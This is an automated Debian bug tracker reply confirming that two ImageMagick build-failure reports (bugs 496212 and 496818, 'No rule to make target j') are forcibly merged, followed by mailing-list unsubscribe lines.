Processing commands for [EMAIL PROTECTED]: forcemerge 496212 496818 Bug#496212: imagemagick_7:6.4.3.2.dfsg1-1(ia64/experimental): FTBFS: No rule to make target `j'. Stop. Bug#496818: imagemagick 7:6.4.3.2.dfsg1-1(amd64/experimental): FTBFS: make[1]: *** No rule to make target `j'. Stop Forcibly Merged 496212 496818. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
